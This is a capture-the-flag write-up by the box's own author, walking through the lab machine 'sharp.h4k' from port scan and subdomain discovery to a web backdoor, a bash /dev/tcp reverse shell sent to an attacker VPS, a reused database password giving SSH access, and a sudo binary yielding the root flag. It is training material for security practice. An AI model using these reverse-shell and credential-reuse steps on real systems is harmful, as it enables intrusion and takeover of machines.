Try   HackMD

ENUMERATION

First thing we do is scan the ports:

Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-25 01:20 EAT
Nmap scan report for sharp.h4k (23.101.27.202)
Host is up (0.39s latency).
Not shown: 96 closed tcp ports (conn-refused)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 2.26 seconds

Got 4 ports open!

Opened up port 80 on web but nothing shows up just a default working page for apache2

Since I made this challenge I wont dirbust coz I know once I dirbust nothing will show up , because there is nothing at all, which means the legit way is what i'll be showing (THE INTENDED WAY) of how to solve my box!

RECON

So first thing is to perform a subdomain scan

and we get 3 subdomains that are found :

admin.sharp.h4k
api.sharp.h4k
pma.sharp.h4k

So first thing comes into mind is that we already see that admin.sharp.h4k must be the admin panel and then the api.* is the api or somn' and then we have pma.sharp.h4k probably the phpMyAdmin portal.

Add those subdomains to your /etc/hosts file then let's get started! by first checking the admin panel

And we are viewing a login page for an admin dashboard

Tryin SQLi wont work:) so it'll be a total waste of time but basically that is how a person solving this box would do , is try SQLi and maybe dirbusting but I assure you will get nothing at all:)

So let's check api.sharp.h4k, we get an underdevelopment page , so this means the api is still underdev , but normally developers would have to save their backup file inside even though it's still underdevelopment so , let's try dirbusting this subdomain instead:

Okay looks like we have one directory , and that is /images/ So let's dive into it:

Alright looks like we have something that's named SECRET API CALLS as the title!

this sure looks like a backdoor that a hacker might have installed in the same target that we are given , let's try typing in a command and see what we get!

That is what I got after typing id , so yes we are right , it's a backdoor

GAINING INITIAL FOOTHOLD

We can easily get shell by just setting a listener and then forwarding our self a shell easy as that , so why not let's try it!

So on my terminal I'll set up a listener on port 1337

And then from the input i'll type in a command that will give us back a revshell as follows :

bash -c "bash -i &>/dev/tcp/yourip/1337 <&1"

and then click submit

You didn't expect that to work did you??
Well the reason it didn't work it's because it's a server using a public IP and we are a private IP so it's either you use a VPS to grab shell or make ur localhost PUBLIC, well I have VPS so i'll just go ahead and use it instead! but if you are not having a VPS then you can use Ngrok for tunneling.

Alright Now that I have a listener running on my VPS , i just do the same methods but with my VPS's IP address and not my localhost

And boom we have SHELL!!!

So Now let's gather some config files and escalate our privileges to a user first of all let's check what user is available

www-data@sharp:/var/www/api/images$ cat /etc/passwd | grep /home
cat /etc/passwd | grep /home
xploiter:x:1000:1000::/home/xploiter:/bin/bash
babukrismasi:x:1001:100::/home/babukrismasi:/bin/bash

we have a total of 2 users , who are xploiter and babukrismasi , so let's grab some config by performing some lateral movement

www-data@sharp:/var/www$ -al
ls -al
total 24
drwxr-xr-x  6 root root 4096 Dec 24 10:58 .
drwxr-xr-x 12 root root 4096 Dec 20 22:04 ..
drwxr-xr-x  4 root root 4096 Dec 24 10:51 admin
drwxr-xr-x  3 root root 4096 Dec 24 11:26 api
drwxr-xr-x  2 root root 4096 Dec 20 22:04 html
drwxr-xr-x 11 root root 4096 Dec 24 11:02 myadmin

moving into admin first because dashboards such of these usually have configuration files

www-data@sharp:/var/www/admin/lib$ -la
ls -la
total 32
drwxr-xr-x 2 root root 4096 Dec 24 11:12 .
drwxr-xr-x 4 root root 4096 Dec 24 10:51 ..
-rw-r--r-- 1 root root   13 Jun  8  2018 .htaccess
-rw-r--r-- 1 root root  711 Dec 24 11:12 Core.php
-rw-r--r-- 1 root root 1131 Nov 11 10:18 LIB-database.php
-rw-r--r-- 1 root root   47 Nov 11 00:17 PAGE-bottom.php
-rw-r--r-- 1 root root 1546 Nov 11 11:00 PAGE-top.php
-rw-r--r-- 1 root root  693 Jan 28  2021 SQL-users.sql

I found Core.php which has some connection to the MYSQL

www-data@sharp:/var/www/admin/lib$ cat Core.php	
cat Core.php
<?php
// (A) ERROR HANDLING - CHANGE TO YOUR OWN
error_reporting(E_ALL & ~E_NOTICE);
ini_set("display_errors", 1);
// ini_set("log_errors", 1);
// ini_set("error_log", "PATH/error.log");

// (B) DATABASE SETTINGS - CHANGE TO YOUR OWN
define("DB_HOST", "localhost");
define("DB_NAME", "panel");
define("DB_CHARSET", "utf8");
define("DB_USER", "root");
define("DB_PASSWORD", "superPassw0rd");

// (C) URL
define("URL_HOST", "http://admin.sharp.h4k/"); // CHANGE TO YOUR OWN
define("URL_PUBLIC", URL_HOST . "public/");

// (D) FILE PATHS
define("PATH_LIB", __DIR__ . DIRECTORY_SEPARATOR);
define("PATH_BASE", dirname(PATH_LIB) . DIRECTORY_SEPARATOR);

// (E) START SESSION
session_start();

So we got mysql username and password which is root:superPassw0rd , let's try reuse the same password for the users available.

FOOTHOLD USER

I was now able to login via ssh to babukrismasi with the password superPassw0rd

And we get the flag from his home folder:

babukrismasi@sharp:~$ ls -al
total 24
drwxr-xr-x 2 babukrismasi users 4096 Des 24 12:49 .
drwxr-xr-x 4 root         root  4096 Des 24 11:34 ..
-rw-r--r-- 1 babukrismasi users  220 Mei 15  2017 .bash_logout
-rw-r--r-- 1 babukrismasi users 3526 Mei 15  2017 .bashrc
-rw-r--r-- 1 root         root    24 Des 24 12:49 flag.txt
-rw-r--r-- 1 babukrismasi users  675 Mei 15  2017 .profile
babukrismasi@sharp:~$ cat flag.txt 
h4k-it{USERMTATA_KWELI}
FLAG FOR SHARP - USER : h4k-it{USERMTATA_KWELI}

PRIVILEGE ESCALATION

Alright with that being found , let's escalate our privileges to root

So first we do is check what privileges we have that allows us to run a certain binary with SUDO perms using sudo -l

babukrismasi@sharp:~$ sudo -l
[sudo] password for babukrismasi: 
Matching Defaults entries for babukrismasi on sharp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User babukrismasi may run the following commands on sharp:
    (ALL) /usr/bin/vitayakrismasi

and we can run the binary named vitayakrismasi using sudo with user babukrismasi so let's try and see what the binary does and try reverse it if it needs us to!

it needs a username to proceed, So I check the strings and I'm able to get a glimps of what the username and password might be:

so the usernames according to my gathering can be either spiderman or fazakrismasi, so let's give it a try

we get prompted for a password

babukrismasi@sharp:~$ sudo vitayakrismasi
SPIDERMAN VERSUS BABU KRISMASI
UTAJUA HUJUI KUDADEKI! 
Enter username : fazakrismasi
Welcome Faza Krismasi , Enter your password : adminadmin
IMPOSTER NYAMA WEWE!

but we dont know the password , I try performing Ltrace but still nothing comes accross

babukrismasi@sharp:~$ ltrace vitayakrismasi 1
puts("SPIDERMAN VERSUS BABU KRISMASI"SPIDERMAN VERSUS BABU KRISMASI
)                           = 31
puts("UTAJUA HUJUI KUDADEKI! "UTAJUA HUJUI KUDADEKI! 
)                                  = 24
printf("Enter username : ")                                      = 17
gets(0x7ffd421a0ef6, 0x5632251afa6f, 0x7f6569ba5760, 0x5632251afa80Enter username : fazakrismasi
) = 0x7ffd421a0ef6
strcmp("fazakrismasi", "spiderman")                              = -13
strcmp("fazakrismasi", "fazakrismasi")                           = 0
printf("Welcome Faza Krismasi , Enter yo"...)                    = 46
__isoc99_scanf(0x5632251afab3, 0x7ffd421a0ed8, 0x7f6569ba5760, 0x5632251afb4eWelcome Faza Krismasi , Enter your password : admin
) = 0
puts("IMPOSTER NYAMA WEWE!"IMPOSTER NYAMA WEWE!
)                                     = 21
+++ exited (status 0) +++

So there are baiscally two ways getting the password now , so the first way is to guess and the second way is to pull the binary to ur localhost for investigations , and i'll consider doing that way lol!

First move to /tmp:

babukrismasi@sharp:/tmp$ ls -l
total 60
-rw-r--r-- 1 xploiter     xploiter 35560 Apr 29  2019 mysql-apt-config_0.8.13-1_all.deb
drwx------ 3 root         root      4096 Des 24 13:10 systemd-private-773be1f6958c44f29cfec16a7f1b4984-apache2.service-b1WVzE
drwx------ 3 root         root      4096 Des 23 14:14 systemd-private-773be1f6958c44f29cfec16a7f1b4984-systemd-timesyncd.service-h1j06s
-rw-r--r-- 1 babukrismasi users        9 Des 25 15:16 tobedeleted.txt
-rwxr-xr-x 1 xploiter     xploiter  8912 Des 25 15:13 vitayakrismasi

we get the binary also available over there, and we also have another file named tobedeleted.txt let's read it inside:

babukrismasi@sharp:/tmp$ cat tobedeleted.txt 
25122021

Alright we get some numbers that make up the christmass date , that's probably the password let's test it on the binary:

babukrismasi@sharp:/tmp$ ./vitayakrismasi 
SPIDERMAN VERSUS BABU KRISMASI
UTAJUA HUJUI KUDADEKI! 
Enter username : fazakrismasi
Welcome Faza Krismasi , Enter your password : 25122021
Why are you mad na?, RELAX BIG MAN , Spiderman ran away!
cat: /root/flag.txt: Permission denied

And perfectly worked!

So now let's do it with sudo :

babukrismasi@sharp:~$ sudo vitayakrismasi 
[sudo] password for babukrismasi: 
SPIDERMAN VERSUS BABU KRISMASI
UTAJUA HUJUI KUDADEKI! 
Enter username : fazakrismasi
Welcome Faza Krismasi , Enter your password : 25122021
Why are you mad na?, RELAX BIG MAN , Spiderman ran away!
h4k-it{uschezenakrismasi_sio_poa}

and we have the ROOT FLAG!!!

h4k-it{uschezenakrismasi_sio_poa}

25 | 12 | 2021 | @tahaafarooq (twitter)
Last changed by 
Tahaa Farooq
お前はもう死んでいる
0
2
193

Read more

UnderPass Hackthebox Writeup

An easy box from HTB, we first get access to daloradius with weak credentials using them to expose a potential user with his hashed (weak) password, I crack the password ending up getting the plaintext password and we use the password to login to the host via SSH! Easy Win! Lastly we escalate our privileges by taking advantage of Mosh (Mobile Shell). 🚀

May 10, 2025
Secret Writeup Hackthebox

So found 3 open ports , 22(SSH), 80(HTTP) , 3000(HTTP) with Node.js , Opening port 80 it had a landing page which was titled Dump Docs , and both were also there on port 3000 with a file named files.zip attached which contains the source code of how the api works

Apr 27, 2025
DLINK DPH-400SE - Exposure of Sensitive Information to an Unauthorized Actor

With default credential for the guest user “guest:guest” to login on the web portal, the guest user can head to maintenance tab under access and modify the users which allows guest user to modify all users as well as view passwords for all users.

Feb 20, 2025
File Transfer Tricks

As a penetration tester, you have happened to gain access to a few target hosts (windows & linux) within the scope of your engagement and you are now required to transfer some files from your host to the target's host and vise versa, what do you do?

Jan 13, 2025
Read more from Tahaa Farooq
Published on HackMD